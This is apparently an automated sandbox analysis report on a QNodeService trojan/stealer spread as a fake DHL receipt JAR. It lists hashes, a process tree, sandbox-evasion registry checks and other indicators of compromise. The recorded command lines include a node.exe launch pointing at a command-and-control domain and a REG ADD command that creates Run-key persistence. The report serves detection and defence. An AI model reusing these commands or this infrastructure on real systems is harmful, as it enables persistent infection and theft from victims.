Analysis
-
max time kernel
67s -
max time network
136s -
platform
windows10_x64 -
resource
win10 -
submitted
26-10-2020 08:58
Static task
static1
Behavioral task
behavioral1
Sample
DHL_10090AWB_09800123_RECIEPT00097.jar
Resource
win7
Behavioral task
behavioral2
Sample
DHL_10090AWB_09800123_RECIEPT00097.jar
Resource
win10
General
-
Target
DHL_10090AWB_09800123_RECIEPT00097.jar
-
Size
67KB
-
MD5
6537cf38f55f14c495f66cc0589a37f4
-
SHA1
221ce81e11da1b315e858a441b728c56d52e33fd
-
SHA256
3d9145b3312989c4484d9f7d8baa1f0c05a55126f2a5443e91ddd4ada9dcb3ba
-
SHA512
dfc73eb9bb954ec8ba7954ca2a7e92f4f0c551fd3abce5bec65e408c0554f0fb1db8dd49cec3d96b7c97d3f321f78f78d97bb23da0902cbebe008f18b0ccd86f
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
Processes:
node.exenode.exenode.exepid process 1288 node.exe 3032 node.exe 2376 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\8bf6b82f-3a9b-4821-be10-2c795dd7ec07 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\node-v14.12.0-win-x64\node.exe js C:\Users\Admin\node-v14.12.0-win-x64\node.exe js C:\Users\Admin\node-v14.12.0-win-x64\node.exe js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 29 wtfismyip.com 30 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
node.exenode.exenode.exepid process 1288 node.exe 1288 node.exe 1288 node.exe 1288 node.exe 3032 node.exe 3032 node.exe 3032 node.exe 3032 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe 2376 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
java.exejavaw.exenode.exenode.exenode.execmd.exedescription pid process target process PID 3848 wrote to memory of 2384 3848 java.exe javaw.exe PID 3848 wrote to memory of 2384 3848 java.exe javaw.exe PID 2384 wrote to memory of 1288 2384 javaw.exe node.exe PID 2384 wrote to memory of 1288 2384 javaw.exe node.exe PID 1288 wrote to memory of 3032 1288 node.exe node.exe PID 1288 wrote to memory of 3032 1288 node.exe node.exe PID 3032 wrote to memory of 2376 3032 node.exe node.exe PID 3032 wrote to memory of 2376 3032 node.exe node.exe PID 2376 wrote to memory of 3756 2376 node.exe cmd.exe PID 2376 wrote to memory of 3756 2376 node.exe cmd.exe PID 3756 wrote to memory of 2920 3756 cmd.exe reg.exe PID 3756 wrote to memory of 2920 3756 cmd.exe reg.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\DHL_10090AWB_09800123_RECIEPT00097.jar1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\ec4a689c.tmp2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain glotronic.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_dPNz6X\boot.js --hub-domain glotronic.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_dPNz6X\boot.js --hub-domain glotronic.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "8bf6b82f-3a9b-4821-be10-2c795dd7ec07" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "8bf6b82f-3a9b-4821-be10-2c795dd7ec07" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestampMD5
04c02d358f1c4a4a83e967c94ea13910
SHA1c58b5ee392ad20fd8dd8227ab9129af003766a3e
SHA256008872981dcb42cb68372e53b250a183f7927ebeedccdd3ee2b92f788b3eabde
SHA512ede76cb1369777073bca9e925ee43d68a17214e5aaba7f1338c92b6135e0f30c9dcf455bff1a536add729686e607a208b093958ddbf8005afe3c8ed3bb3506fc
-
C:\Users\Admin\AppData\Local\Temp\_qhub_node_dPNz6X\boot.jsMD5
3859487feb5152e9d1afc4f8cd320608
SHA17bf154c9ddf3a71abf15906cdb60773e8ae07b62
SHA2568d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
SHA512826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8
-
C:\Users\Admin\AppData\Local\Temp\ec4a689c.tmpMD5
6537cf38f55f14c495f66cc0589a37f4
SHA1221ce81e11da1b315e858a441b728c56d52e33fd
SHA2563d9145b3312989c4484d9f7d8baa1f0c05a55126f2a5443e91ddd4ada9dcb3ba
SHA512dfc73eb9bb954ec8ba7954ca2a7e92f4f0c551fd3abce5bec65e408c0554f0fb1db8dd49cec3d96b7c97d3f321f78f78d97bb23da0902cbebe008f18b0ccd86f
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
memory/1288-169-0x0000000000000000-mapping.dmp
-
memory/1288-172-0x000003BB855C0000-0x000003BB855C1000-memory.dmpFilesize
4KB
-
memory/2376-177-0x0000000000000000-mapping.dmp
-
memory/2376-179-0x000002C86C600000-0x000002C86C601000-memory.dmpFilesize
4KB
-
memory/2384-52-0x0000000000000000-mapping.dmp
-
memory/2920-181-0x0000000000000000-mapping.dmp
-
memory/3032-173-0x0000000000000000-mapping.dmp
-
memory/3032-175-0x0000027AA7E00000-0x0000027AA7E01000-memory.dmpFilesize
4KB
-
memory/3756-180-0x0000000000000000-mapping.dmp